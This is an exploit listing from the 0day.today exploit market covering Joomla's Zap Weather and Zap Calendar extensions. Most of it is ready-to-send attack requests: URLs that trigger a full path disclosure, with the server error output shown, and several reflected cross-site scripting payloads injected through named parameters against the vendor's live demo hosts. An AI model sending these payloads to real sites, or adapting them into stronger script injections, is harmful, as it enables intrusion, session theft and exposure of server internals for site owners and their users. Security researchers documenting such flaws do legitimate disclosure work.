[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Zap Weather FPD & Zap Calendar XSS Vulnerability

Author
Smash_
Risk
[
Security Risk High
]
0day-ID
0day-ID-21783
Category
web applications
Date add
21-01-2014
Platform
php
#Title - Joomla Zap Weather FPD & Zap Calendar XSS
#Date: 01.21.2014
#Vendor: zcontent.net ( extensions.joomla.org/extensions/owner/cogliano )
#Versions - Z Weather v9 & Zap Calendar v4.0 (Latests ATM)
#Contant: smash[at]devilteam.pl

#Zap Weather

PoC - zcontent.net/demo/zapweather


1. Full Path Disclosure

Request:
zcontent.net/demo/zapweather?view=location&id[]=5layout=alert&tmpl=component

OR

http://zcontent.net/demo/zapweather?view=location&id=-666&layout=alert&tmpl=component

Error appears:

Error
        Failed loading XML file

Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315

Warning: Invalid argument supplied for foreach() in /var/www/zcontent/libraries/joomla/database/database.php on line 1315

Warning: Invalid argument supplied for foreach() in /var/www/zcontent/components/com_zweather/views/location/view.html.php on line 324

#Zap Calendar

1. Cross Site Scripting at Events

- Itemid

GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1&Itemid=118"><script>alert(666)</script>&tmpl=component HTTP/1.1
Host: www.zapcalendar.com

- Calid

GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196&calid=1"><script>alert(666)</script>&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com 

- Id

GET /index.php/demo/index.php?option=com_zcalendar&view=event&id=196"><script>alert(666)</script>&calid=1&Itemid=118&tmpl=component HTTP/1.1
Host: www.zapcalendar.com

2. Cross Site Scripting at Calendar


- Itemid

Request:
www.zapcalendar.com/index.php/demo/index.php?Itemid=118"><script>alert(666)</script>&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01&limitstart=0

- Ctype

Request:
www.zapcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m"><script>alert(666)</script>&ajax=1&format=raw&date=2014-05-01&limitstart=0

- Date

Request:
www.zapcalendar.com/index.php/demo/index.php?Itemid=118&option=com_zcalendar&view=calendar&id=1&ctype=m&ajax=1&format=raw&date=2014-05-01"><script>alert(666)</script>&limitstart=0

#  0day.today [2024-12-25]  #